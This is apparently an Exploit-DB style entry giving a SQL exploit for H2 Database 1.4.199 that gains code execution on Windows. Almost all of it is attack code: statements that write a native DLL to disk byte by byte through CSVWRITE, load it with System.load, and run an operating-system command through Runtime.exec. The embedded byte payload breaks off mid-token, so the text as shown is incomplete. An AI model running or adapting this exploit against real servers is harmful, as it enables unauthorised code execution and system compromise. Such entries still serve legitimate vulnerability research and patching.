# Exploit Title: H2 Database 1.4.199 - JNI Code Execution
# Exploit Author: 1F98D
# Original Author: Markus Wulftange
# Date: 28 April 2020
# Vendor Hompage: https://www.h2database.com/
# Tested on: Windows 10 x64, Java 1.8, H2 1.4.199
# References: https://codewhitesec.blogspot.com/2019/08/exploit-h2-database-native-libraries-jni.html
# H2 allows users to gain code execution by compiling and running Java code
# however this requires the Java Compiler to be available on the machine running H2.
# This exploit utilises the Java Native Interface to load a a Java class without
# needing to use the Java Compiler
-- Write native library
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', CHAR(0x4d),CHAR(0x5a),CHAR(0x90),CHAR(0x00),CHAR(0x03),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xff),CHAR(0xff),CHAR(0x00),CHAR(0x00),CHAR(0xb8),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x40),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x0e),CHAR(0x1f),CHAR(0xba),CHAR(0x0e),CHAR(0x00),CHAR(0xb4),CHAR(0x09),CHAR(0xcd),CHAR(0x21),CHAR(0xb8),CHAR(0x01),CHAR(0x4c),CHAR(0xcd),CHAR(0x21),CHAR(0x54),CHAR(0x68),CHAR(0x69),CHAR(0x73),CHAR(0x20),CHAR(0x70),CHAR(0x72),CHAR(0x6f),CHAR(0x67),CHAR(0x72),CHAR(0x61),CHAR(0x6d),CHAR(0x20),CHAR(0x63),CHAR(0x61),CHAR(0x6e),CHAR(0x6e),CHAR(0x6f),CHAR(0x74),CHAR(0x20),CHAR(0x62),CHAR(0x65),CHAR(0x20),CHAR(0x72),CHAR(0x75),CHAR(0x6e),CHAR(0x20),CHAR(0x69),CHAR(0x6e),CHAR(0x20),CHAR(0x44),CHAR(0x4f),CHAR(0x53),CHAR(0x20),CHAR(0x6d),CHAR(0x6f),CHAR(0x64),CHAR(0x65),CHAR(0x2e),CHAR(0x0d),CHAR(0x0d),CHAR(0x0a),CHAR(0x24),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x4e),CHAR(0xb0),CHAR(0xdb),CHAR(0x83),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x03),CHAR(0xa9),CHAR(0x26),CHAR(0xd0),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb4),CHAR(0xd1),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x51),CHAR(0xb9),CHAR(0xb4),CHAR(0xd1),CHAR(0x09),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x0a),CHAR(0xd1),CHAR(0xb4),CHAR(0xd0),CHAR(0x28),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb0),CHAR(0xd1),CHAR(0x01),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb1),CHAR(0xd1),CHAR(0x02),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x01),CHAR(0xbe),CHAR(0xb6),CHAR(0xd1),CHAR(0x08),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb1),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb5),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0xc8),CHAR(0xbe),CHAR(0xb7),CHAR(0xd1),CHAR(0x0b),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x52),CHAR(0x69),CHAR(0x63),CHAR(0x68),CHAR(0x0a),CHAR(0xd1),CHAR(0xb5),CHAR(0xd0),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x50),CHAR(0x45),CHAR(0x00),CHAR(0x00),CHAR(0x64),CHAR(0x86),CHAR(0x05),CHAR(0x00),CHAR(0x1c),CHAR(0xe7),CHAR(0xa7),CHAR(0x5e),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0xf0),CHAR(0x00),CHAR(0x22),CHAR(0x22),CHAR(0x20),CHAR(0x0b),CHAR(0x02),CHAR(0x0e),CHAR(0x19),CHAR(0x00),CHAR(0x12),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x1c),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x16),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x80),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x06),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x70),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x04),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x02),CHAR(0x00),CHAR(0x60),CHAR(0x01),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x00),CHAR(0x10),CHAR(0x00),CHAR(0x00),C
-- Load native library
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";
CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll');
-- Evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("whoami").getInputStream()).useDelimiter("\\Z").next()');